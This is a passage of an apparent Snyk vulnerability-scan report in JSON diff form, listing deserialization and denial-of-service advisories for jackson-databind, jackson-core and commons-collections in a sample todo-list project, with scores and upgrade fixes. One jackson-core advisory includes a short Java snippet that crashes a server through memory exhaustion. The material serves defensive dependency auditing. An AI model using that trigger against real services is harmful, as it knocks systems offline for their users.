"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:04.422288Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:34.457712Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.593938Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:04.422288Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:34.457712Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19360`) is not identical to `CVE-2018-19362` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", + "epssDetails": { + "percentile": "0.81590", + "probability": "0.00788", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-19360" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-f9hv-mg5h-xcw9" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-01-03T14:17:23.673097Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-01-02T19:18:44Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-01-03T17:01:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:34.457712Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72884", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Wuguixiong" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2186", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", + "title": "GitHub Release Tag" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.110184Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:51:22.091904Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.548577Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.110184Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:22.091904Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `axis2-transport-jms ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19361`) is not identical to `CVE-2018-19362` and `CVE-2018-19360`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", + "epssDetails": { + "percentile": "0.81590", + "probability": "0.00788", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-19361" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mx9v-gmh4-mgqw" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-01-03T14:17:31.715185Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-01-02T19:18:43Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-01-03T17:01:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:22.091904Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31519", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Alessio Soldano" + ], + "semver": { + "vulnerable": [ + "[,2.8.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.8.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/UTF8StreamJsonParser.java", + "className": "UTF8StreamJsonParser", + "functionName": "_reportInvalidToken" + } + }, + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/ReaderBasedJsonParser.java", + "className": "ReaderBasedJsonParser", + "functionName": "_reportInvalidToken" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-core", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-core/pull/322", + "title": "GitHub PR" + }, + { + "url": "https://issues.jboss.org/browse/JBEAP-6316", + "title": "Jira Issue" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + 
"cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:01.546686Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). If the REST endpoint consumes POST requests with JSON or XML data and data are invalid, the first unrecognized token is printed to server.log\r\n> If the first token is word of length 10MB, the whole word is printed. This is potentially dangerous and can be used to attack the server by filling the disk with logs.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.8.6 or higher.\n## References\n- [GitHub PR](https://github.com/FasterXML/jackson-core/pull/322)\n- [Jira Issue](https://issues.jboss.org/browse/JBEAP-6316)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-399" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-core", + "proprietary": false, + "creationTime": "2017-09-20T15:28:35.195000Z", + "functions_new": [ + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.UTF8StreamJsonParser", + "functionName": "_reportInvalidToken" + } + }, + { + "version": [ + "[,2.8.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.ReaderBasedJsonParser", + "functionName": "_reportInvalidToken" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-01-12T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-core" + }, + "publicationTime": "2017-09-20T15:28:35Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T13:58:01.546686Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-core@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-core@2.8.6" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-core", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31520", + "title": "Denial of Service (DoS)", + "CVSSv3": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "gmethwin@github" + ], + "semver": { + "vulnerable": [ + "[2.3.0-rc1,2.7.7)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.7.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/UTF8JsonGenerator.java", + "className": "UTF8JsonGenerator", + "functionName": "writeNumber" + } + }, + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/core/json/WriterBasedJsonGenerator.java", + "className": "WriterBasedJsonGenerator", + "functionName": "writeNumber" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-core", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-core/issues/315", + "title": "GitHub Issue" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:48.004490Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-core](https://github.com/FasterXML/jackson-core) is a Core Jackson abstractions, basic JSON streaming API implementation\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). 
When `WRITE_BIGDECIMAL_AS_PLAIN` setting is enabled, Jackson will attempt to write out the whole number, no matter how large the exponent.\r\nThe following sample code will trigger an out of memory exception:\r\n```java\r\nObjectMapper mapper = new ObjectMapper().enable(JsonGenerator.Feature.WRITE_BIGDECIMAL_AS_PLAIN);\r\nmapper.writeValueAsString(new java.math.BigDecimal(\"9.223372E+1010671858\"));\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. 
For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-core` to version 2.7.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-core/commit/96642978dcf1b69cba68ec72cb2f652d59a8b5be)\n- [GitHub Issue](https://github.com/FasterXML/jackson-core/issues/315)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-399" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-core", + "proprietary": false, + "creationTime": "2017-09-20T15:28:35.195000Z", + "functions_new": [ + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.UTF8JsonGenerator", + "functionName": "writeNumber" + } + }, + { + "version": [ + "[2.3.0-rc1,2.7.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.core.json.WriterBasedJsonGenerator", + "functionName": "writeNumber" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2016-08-25T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-core" + }, + "publicationTime": "2017-09-20T15:28:35Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T13:55:48.004490Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-core@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-core@2.7.7" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-core", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMMONSCOLLECTIONS-30078", + "title": "Deserialization of 
Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[3.0,3.2.2)" + ] + }, + "exploit": "High", + "fixedIn": [ + "3.2.2" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[3,3.2.2)" + ], + "functionId": { + "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java", + "className": "InvokerTransformer", + "functionName": "transform" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "commons-collections:commons-collections", + "references": [ + { + "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/", + "title": "FoxGloveSecurity Blog" + }, + { + "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611", + "title": "GitHub Commit" + }, + { + "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580", + "title": "Jira Issue" + }, + { + "url": "https://github.com/ianxtianxt/CVE-2015-7501", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:27.924934Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:52:38.421377Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.078866Z" + }, + { + "type": "secondary", + "vector": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:27.924934Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:38.421377Z" + } + ], + "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-4852](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-6056408)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). 
It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n", + "epssDetails": { + "percentile": "0.88407", + "probability": "0.01844", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-7501" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "commons-collections:commons-collections", + "proprietary": false, + "creationTime": "2016-12-25T16:51:56Z", + "functions_new": [ + { + "version": [ + "[3,3.2.2)" + ], + "functionId": { + "className": "org.apache.commons.collections.functors.InvokerTransformer", + "functionName": "transform" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2015-11-06T16:51:56Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "commons-collections", + "artifactId": "commons-collections" + }, + "publicationTime": "2015-11-06T16:51:56Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:38.421377Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + 
